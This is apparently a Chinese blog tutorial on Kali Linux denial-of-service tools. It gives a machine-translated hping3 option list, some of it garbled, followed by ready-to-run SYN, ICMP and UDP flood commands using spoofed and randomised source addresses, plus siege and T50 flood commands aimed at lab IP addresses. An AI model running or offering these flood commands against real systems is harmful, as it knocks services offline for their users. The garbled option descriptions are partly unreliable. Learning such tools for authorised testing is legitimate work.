• kali linux之拒绝服务攻击工具


    hping3

    几乎可以定制发送任何TCP/IP数据包,用于测试FW,端口扫描,性能测试

    -c - 计数包计数
      -i - interval wait(uX表示X微秒,例如-i u1000)
           - -i u10000的快速别名(第二个10个数据包)
           - -i u1000的快速别名(第二个100个数据包)
           --flood尽可能快地发送数据包。不要显示回复。
      -n - 数字数字输出
      -q - 安静
      -I - 接口接口名称(否则为默认路由接口)
      -V - verbose verbose模式
      -D - 调试调试信息
      -z - 绑定ctrl + z到ttl(默认为dst端口)
      -Z - unbind unbind ctrl + z - 为收到的每个匹配数据包发出蜂鸣声


    模式
      默认模式TCP
      -0 - RAIP RAW IP模式
      -1 - icmp ICMP模式
      -2 - 表示UDP模式
      -8 - 扫描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
      -9 - 听听模式


    IP
      -a - 欺骗欺骗源地址
      --rand-dest随机destionation地址模式。看到那个男人。
      --rand-source随机源地址模式。看到那个男人。
      -t --ttl ttl(默认64)
      -N - id id(默认随机)
      -W --winid使用win * id字节排序
      -r --rel相对化id字段(估计主机流量)
      -f --frag分割更多碎片的数据包。 (可以通过弱acl)
      -x --morefrag设置更多片段标志
      -y --dontfrag set不分片标志
      -g --fragoff设置片段偏移量
      -m --mtu设置虚拟mtu,暗示--frag如果数据包大小> mtu
      -o --tos服务类型(默认为0x00),尝试--tos帮助
      -G --rroute包含RECORD_ROUTE选项并显示路由缓冲区
      --lsrr松散的源路由和记录路由
      --ssrr严格的源路由和记录路由
      -H --ipproto仅在RAW IP模式下设置IP协议字段


    ICMP
      -C --icmptype icmp type(默认回显请求)
      -K - icmpcode icmp code(默认为0)
          --force-icmp发送所有icmp类型(默认发送仅支持的类型)
          --icmp-gw设置ICMP重定向的网关地址(默认为0.0.0.0)
          --icmp-ts别名为--icmp --icmptype 13(ICMP时间戳)
          --icmp-addr别名为--icmp --icmptype 17(ICMP地址子网掩码)
          --icmp-help显示其他icmp选项的帮助


    UDP / TCP
      -s --baseport基本源端口(默认随机)
      -P --destport [+] [+] <port>目标端口(默认为0)ctrl + z inc / dec
      -k - 保持静止源端口
      -w --win winsize(默认64)
      -O -​​-tcpoff设置假tcp数据偏移量(而不是tcphdrlen / 4)
      -Q --seqnum仅显示tcp序列号
      -b --badcksum(尝试)发送具有错误IP校验和的数据包
                       许多系统将修复发送数据包的IP校验和
                       所以你会得到错误的UDP / TCP校验和。
      -M --setseq设置TCP序列号
      -L --setack设置TCP确认
      -F --fin设置FIN标志
      -S --syn设置SYN标志
      -R - 首先设置RST标志
      -P --push设置PUSH标志
      -A --ack设置ACK标志
      -U - 设置URG标志
      -X --xmas设置X未使用标志(0x40)
      -Y --ymas设置Y未使用标志(0x80)
      --tcpexitcode使用最后的tcp-> th_flags作为退出代码
      --tcp-mss启用具有给定值的TCP MSS选项
      --tcp-timestamp启用TCP时间戳选项以猜测HZ /正常运行时间


    同项
      -d - 数据数据大小(默认为0)
      -E - 文件中的文件数据
      -e --sign添加'签名'
      -j --dump以十六进制转储数据包
      -J --print转储可打印字符
      -B --safe启用“安全”协议
      -u --end告诉你--file何时达到EOF并防止倒带
      -T --traceroute traceroute mode(暗示--bind和--ttl 1)
      --tr-stop在traceroute模式下收到第一个非ICMP时退出
      --tr-keep-ttl保持源TTL固定,仅用于监视一跳
      --tr-no-rtt不要在traceroute模式下计算/显示RTT信息,ARS包描述(新的,不稳定的)
      --apd-send发送APD描述的数据包

    syn flood攻击

    hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12

    hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12

    hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12

    icmp flood攻击

    hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10

    udp flood攻击

    hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10

    Siege:http/https压力测试工具,模拟多个用户并发访问请求
     siege -g http://192.168.1.12/xxsec.php / 192.168.1.12


    T50
    t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
    t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22 

     友情链接 http://www.cnblogs.com/klionsec

                   http://www.cnblogs.com/l0cm

                   http://www.cnblogs.com/Anonyaptxxx

                   http://www.feiyusafe.cn

  • 相关阅读:
    Android学习之天气预报简单版
    Android学习之Json数据的获取与解析
    getPath()返回路径包含的“%20”(空格)的处理
    自学php 之数据库连接编程
    bnuoj 1071 拼图++
    hdu 2489 Minimal Ratio Tree
    hdu 4720 Naive and Silly Muggles
    hdu 4725 The Shortest Path in Nya Graph
    经典算法学习:排序之希尔排序(壳排序)
    经典算法学习:排序之插入排序
  • 原文地址:https://www.cnblogs.com/Hydraxx/p/10471454.html
Copyright © 2020-2023  润新知